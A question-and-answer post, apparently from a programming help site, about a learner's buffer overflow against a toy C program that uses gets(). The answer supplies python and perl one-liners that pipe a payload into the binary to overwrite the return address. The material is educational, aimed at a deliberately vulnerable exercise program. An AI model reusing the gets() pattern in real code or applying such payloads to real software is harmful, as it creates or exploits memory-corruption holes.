Search code examples
cbuffer-overflowgets

Need Help Executing Simple Buffer Overflow

I am trying to execute a buffer overflow on this code:

#include <stdio.h>

CanNeverExecute(){
    printf ("You should not be seeing this , right?\n");
}

Greet(){
    char buf [8];
    gets(buf); // This line is vulnerable because "gets" does not perform a length check, it just copies the whole user input
    printf ("Good day, %s\n", buf);
}

int main(){
    Greet();
    return 0;
}

This is the disassembled Greet function:

080484b1 <Greet>:
 80484b1:   55                      push   %ebp
 80484b2:   89 e5                   mov    %esp,%ebp
 80484b4:   53                      push   %ebx
 80484b5:   83 ec 14                sub    $0x14,%esp
 80484b8:   e8 03 ff ff ff          call   80483c0 <__x86.get_pc_thunk.bx>
 80484bd:   81 c3 43 1b 00 00       add    $0x1b43,%ebx
 80484c3:   83 ec 0c                sub    $0xc,%esp
 80484c6:   8d 45 f0                lea    -0x10(%ebp),%eax
 80484c9:   50                      push   %eax
 80484ca:   e8 61 fe ff ff          call   8048330 <gets@plt>
 80484cf:   83 c4 10                add    $0x10,%esp
 80484d2:   83 ec 08                sub    $0x8,%esp
 80484d5:   8d 45 f0                lea    -0x10(%ebp),%eax
 80484d8:   50                      push   %eax
 80484d9:   8d 83 c7 e5 ff ff       lea    -0x1a39(%ebx),%eax
 80484df:   50                      push   %eax
 80484e0:   e8 3b fe ff ff          call   8048320 <printf@plt>
 80484e5:   83 c4 10                add    $0x10,%esp
 80484e8:   90                      nop
 80484e9:   8b 5d fc                mov    -0x4(%ebp),%ebx
 80484ec:   c9                      leave
 80484ed:   c3                      ret

If I am not making a mistake, I have to enter 16 bytes to fill the buffer because this instruction allocates 16 bytes, right? 80484d5: 8d 45 f0 lea -0x10(%ebp),%eax

So I can enter 16 chars then 4 bytes of ebp = 20 bytes + the address of CanNeverExecute. The address shows up as 08048486 in objdump and my machine is little endian so I enter 20 bytes of random characters + address like this:

AAAAAAAAAAAAAAAAAAAA\x86\x84\x04\x08

But it does not work. I can't find the mistake, please help me ty.

Solution

  • When you enter the input with escape characters, you are actually providing the characters '\', 'x', '8', '6' etc. as separate ASCII-encoded bytes. If the characters had corresponded to some correct UTF-8 encoding, you could probably enter it at least by copying and pasting, if not through typing on your keyboard. But exploits rarely correspond to valid encodings, so an alternate is to use another program to supply the specific sequence of bytes through the input stream of your vulnerable binary.

    You can use a python one-liner to supply your input containing escape characters:

    python3 -c "import sys; sys.stdout.buffer.write(b'AAAAAAAAAAAAAAAAAAAA\x86\x84\x04\x08')" | ./yourbinary

    Or using perl:

    perl -e 'print "AAAAAAAAAAAAAAAAAAAA\x86\x84\x04\x08"' | ./yourbinary